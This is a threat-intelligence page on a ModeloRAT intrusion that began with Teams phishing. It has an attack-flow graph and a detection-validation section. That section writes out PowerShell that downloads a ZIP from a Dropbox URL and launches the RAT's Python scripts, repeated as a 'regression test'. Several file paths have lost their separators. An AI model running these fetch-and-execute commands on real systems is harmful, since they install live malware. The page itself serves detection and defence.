SOC Prime Bias: Critical

15 May 2026 13:24 UTC
newspaper icon Rapid7

Dissecting a ModeloRAT Campaign from Teams Phishing to Domain Compromise

Author Photo
SOC Prime Team linkedin icon Follow
Dissecting a ModeloRAT Campaign from Teams Phishing to Domain Compromise
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Rapid7 analyzed an intrusion that started with a malicious Microsoft Teams message masquerading as IT support. The attacker used a Dropbox-hosted Python payload to deploy ModeloRAT, escalate privileges through CVE-2023-36036, and steal domain credentials by presenting a fake lock screen to the victim. The campaign showed how quickly an attacker could move from a single compromised endpoint to broader credential theft across the domain by relying on living-off-the-land techniques. The incident also underscores the growing risk posed by collaboration platforms as an initial access vector.

Investigation

The investigation followed the full attack chain from the initial Teams conversation to a PowerShell stager that downloaded a ZIP archive from Dropbox, unpacked a portable Python environment, and launched collector.py and Pmanager.py. ModeloRAT then established HTTP beaconing to several command-and-control servers, carried out host reconnaissance, and used rundll32 to trigger a kernel exploit that granted SYSTEM-level access. Persistence was maintained through a scheduled task, and the attackers deployed additional backdoor components during the intrusion.

Mitigation

Organizations should apply strict controls over external access in Microsoft Teams, monitor for unusual PowerShell and Python activity, block known malicious Dropbox URLs, and ensure systems are patched against CVE-2023-36036. Application control policies that restrict unauthorized rundll32 usage can help reduce exploitation risk. Security teams should also watch for fake lock-screen behavior and other signs of credential-harvesting activity on endpoints.

Response

If this activity is detected, isolate the affected endpoint immediately, revoke the compromised user’s credentials, and reset impacted domain passwords. Investigators should collect full memory captures, including LSASS-related evidence where appropriate, hunt for ModeloRAT artifacts, and remove any malicious scheduled tasks or persistence mechanisms. Teams tenant settings should also be reviewed, and external chat should be disabled if it is not operationally necessary.

"graph TB %% Class Definitions classDef action fill:#ffcccc classDef tool fill:#cce5ff classDef malware fill:#e6ffcc classDef process fill:#ffd9b3 classDef file fill:#f2e6ff %% Action Nodes action_phishing["<b>Action</b> – <b>T1566.003 Phishing: Spearphishing via Service</b><br/>Microsoft Teams message impersonating IT support with malicious link."] class action_phishing action action_impersonation["<b>Action</b> – <b>T1656 Impersonation</b><br/>Fake IT support account crafted to appear legitimate."] class action_impersonation action action_content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Message contains PowerShell command that starts infection chain."] class action_content_injection action action_user_execution["<b>Action</b> – <b>T1204 User Execution</b><br/>Victim clicks link or copyu2011pastes PowerShell stager."] class action_user_execution action action_software_discovery["<b>Action</b> – <b>T1518 Software Discovery</b><br/>collector.py enumerates installed software, patches and configuration."] class action_software_discovery action action_security_discovery["<b>Action</b> – <b>T1518.001 Security Software Discovery</b><br/>Script checks for AV processes such as SecurityHealthHost.exe."] class action_security_discovery action action_system_info["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>systeminfo, whoami and other commands gather host details."] class action_system_info action action_dll_loading["<b>Action</b> – <b>T1176 Software Extensions</b><br/>rundll32.exe loads malicious DLLs (ssss.dll, com6848.dll)."] class action_dll_loading action action_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/>Exploit CVEu20112023u201136036 in cldflt.sys obtains SYSTEM token."] class action_priv_esc action action_defense_evasion["<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/>Kernel exploit bypasses security controls."] class action_defense_evasion action action_persistence_active_setup["<b>Action</b> – <b>T1547.014 Active Setup Persistence</b><br/>Registry keys under SyncRootManager register malicious cloud sync provider."] class action_persistence_active_setup action action_event_triggered["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Sync provider acts as eventu2011triggered persistence mechanism."] class action_event_triggered action action_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task</b><br/>Daily task TempLogA runs internal.py with SYSTEM privileges."] class action_scheduled_task action action_path_interception["<b>Action</b> – <b>T1574.007 Path Interception</b><br/>Portable Python directory placed early in PATH to ensure execution."] class action_path_interception action action_c2_http["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>ModeloRAT communicates with C2 servers over HTTP port 80."] class action_c2_http action action_nonstandard_port["<b>Action</b> – <b>T1571 Nonu2011Standard Port</b><br/>Additional reverseu2011shell channels use ports 50508 and 60503."] class action_nonstandard_port action action_winrm["<b>Action</b> – <b>T1563 Remote Service Session Hijacking</b><br/>Attacker opens WinRM session to second host for tool deployment."] class action_winrm action action_rdp["<b>Action</b> – <b>T1078.002 Valid Accounts: Domain Accounts</b><br/>Harvested credentials used for RDP logins."] class action_rdp action action_kerberoasting["<b>Action</b> – <b>T1558.003 Kerberoasting</b><br/>Serviceu2011ticket requests generate credential hashes."] class action_kerberoasting action action_os_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>DumpIt.exe captures memory including LSASS."] class action_os_credential_dump action action_unsecured_credentials["<b>Action</b> – <b>T1552.001 Unsecured Credentials</b><br/>Fake locku2011screen DLL logs captured passwords to disk."] class action_unsecured_credentials action action_window_discovery["<b>Action</b> – <b>T1010 Application Window Discovery</b><br/>Locku2011screen replica mimics Windows lock screen to capture input."] class action_window_discovery action action_bits_job["<b>Action</b> – <b>T1197 BITS Jobs</b><br/>DumpIt downloaded and executed via BITS."] class action_bits_job action %% Tool / File / Malware Nodes tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Executes initial stager command."] class tool_powershell tool tool_python["<b>Tool</b> – <b>Name</b>: Portable Python (pythonw.exe)<br/><b>Description</b>: Runs collector.py and Pmanager.py."] class tool_python tool tool_rundll32["<b>Tool</b> – <b>Name</b>: rundll32.exe<br/><b>Description</b>: Loads malicious DLL payloads."] class tool_rundll32 tool tool_dumpit["<b>Tool</b> – <b>Name</b>: DumpIt.exe<br/><b>Description</b>: Memory acquisition utility."] class tool_dumpit tool malware_collector["<b>Malware</b> – <b>Name</b>: collector.py<br/><b>Description</b>: Initial Python script that performs discovery and launches further modules."] class malware_collector malware malware_pmanager["<b>Malware</b> – <b>Name</b>: Pmanager.py (ModeloRAT)<br/><b>Description</b>: Remote access trojan communicating with C2."] class malware_pmanager malware file_ssss_dll["<b>File</b> – <b>Name</b>: ssss.dll<br/><b>Description</b>: Malicious DLL loaded for escalation."] class file_ssss_dll file file_com6848_dll["<b>File</b> – <b>Name</b>: com6848.dll<br/><b>Description</b>: Malicious DLL loaded for credential harvesting."] class file_com6848_dll file file_lockdll["<b>File</b> – <b>Name</b>: lockscreen.dll<br/><b>Description</b>: Fake lock screen that logs passwords."] class file_lockdll file %% Connections u2013 Attack Flow action_phishing –>|uses| action_impersonation action_impersonation –>|delivers| action_content_injection action_content_injection –>|triggers| action_user_execution action_user_execution –>|executes| tool_powershell tool_powershell –>|launches| tool_python tool_python –>|runs| malware_collector tool_python –>|runs| malware_pmanager malware_collector –>|performs| action_software_discovery malware_collector –>|performs| action_security_discovery malware_collector –>|performs| action_system_info malware_pmanager –>|loads| tool_rundll32 tool_rundll32 –>|loads| file_ssss_dll tool_rundll32 –>|loads| file_com6848_dll file_ssss_dll –>|enables| action_priv_esc file_com6848_dll –>|enables| action_priv_esc action_priv_esc –>|provides| action_defense_evasion action_defense_evasion –>|establishes| action_persistence_active_setup action_persistence_active_setup –>|creates| action_event_triggered action_event_triggered –>|creates| action_scheduled_task action_scheduled_task –>|relies on| action_path_interception action_path_interception –>|ensures execution of| malware_pmanager malware_pmanager –>|communicates via| action_c2_http malware_pmanager –>|uses| action_nonstandard_port malware_pmanager –>|opens| action_winrm action_winrm –>|facilitates| action_rdp action_rdp –>|leverages| action_kerberoasting action_kerberoasting –>|provides credentials for| action_os_credential_dump action_os_credential_dump –>|executed by| tool_dumpit tool_dumpit –>|delivered via| action_bits_job action_bits_job –>|supports| action_os_credential_dump action_unsecured_credentials –>|implemented by| file_lockdll file_lockdll –>|captures via| action_window_discovery action_window_discovery –>|writes to| action_unsecured_credentials %% Styling class action_phishing,action_impersonation,action_content_injection,action_user_execution,action_software_discovery,action_security_discovery,action_system_info,action_dll_loading,action_priv_esc,action_defense_evasion,action_persistence_active_setup,action_event_triggered,action_scheduled_task,action_path_interception,action_c2_http,action_nonstandard_port,action_winrm,action_rdp,action_kerberoasting,action_os_credential_dump,action_unsecured_credentials,action_window_discovery,action_bits_job action class tool_powershell,tool_python,tool_rundll32,tool_dumpit tool class malware_collector,malware_pmanager malware class file_ssss_dll,file_com6848_dll,file_lockdll file "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Initial Drop: The attacker, having obtained a foothold on the victim workstation, launches PowerShell to retrieve a malicious ZIP file hosted on Dropbox. The URL is hard‑coded in the detection rule, so the attacker uses the exact same string to guarantee detection (for validation purposes).
    2. Extraction: Using the built‑in Expand‑Archive cmdlet, the archive is unpacked directly into the user’s %APPDATA% folder, a location frequently overlooked by defenders.
    3. Payload Execution: Two Python scripts—collector.py and Pmanager.py—are executed via pythonw.exe (the “windowless” interpreter) to avoid visible console windows, enabling stealthy persistence and data exfiltration.

    Exact commands (must match rule):

    # 1. Download the ZIP archive
iwr -Uri "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:APPDATAWinp.zip"

# 2. Extract the archive
Expand-Archive -Path "$env:APPDATAWinp.zip" -DestinationPath "$env:APPDATA"

# 3. Execute the first Python script
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythoncollector.py"

# 4. Execute the second Python script
Start-Process "$env:APPDATAWPy64-31401pythonpythonw.exe" -ArgumentList "$env:APPDATAWPy64-31401pythonPmanager.py"

  • Regression Test Script:

    # -------------------------------------------------
# Regression Test – Mimic ModeloRAT PowerShell workflow
# -------------------------------------------------
$zipUrl = "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1"
$zipPath = "$env:APPDATAWinp.zip"
$extractPath = $env:APPDATA
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"
$collector = "$env:APPDATAWPy64-31401pythoncollector.py"
$pmanager = "$env:APPDATAWPy64-31401pythonPmanager.py"

# Download
Write-Host "[*] Downloading malicious ZIP..."
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath

# Extract
Write-Host "[*] Extracting archive..."
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

# Execute collector.py
Write-Host "[*] Launching collector.py..."
Start-Process -FilePath $pythonExe -ArgumentList $collector

# Execute Pmanager.py
Write-Host "[*] Launching Pmanager.py..."
Start-Process -FilePath $pythonExe -ArgumentList $pmanager

Write-Host "[+] Simulation complete. Verify SIEM for alert."

  • Cleanup Commands:

    # -------------------------------------------------
# Cleanup – Remove artifacts created by the test
# -------------------------------------------------
$zipPath = "$env:APPDATAWinp.zip"
$extractRoot = "$env:APPDATAWPy64-31401"
$pythonExe = "$env:APPDATAWPy64-31401pythonpythonw.exe"

# Stop any running pythonw processes from this test
Get-Process -Name pythonw -ErrorAction SilentlyContinue |
    Where-Object {$_.Path -like "*WPy64-31401*"} |
    Stop-Process -Force

# Remove extracted directory
if (Test-Path $extractRoot) {
    Remove-Item -Recurse -Force $extractRoot
}

# Remove the ZIP file
if (Test-Path $zipPath) {
    Remove-Item -Force $zipPath
}

Write-Host "[+] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free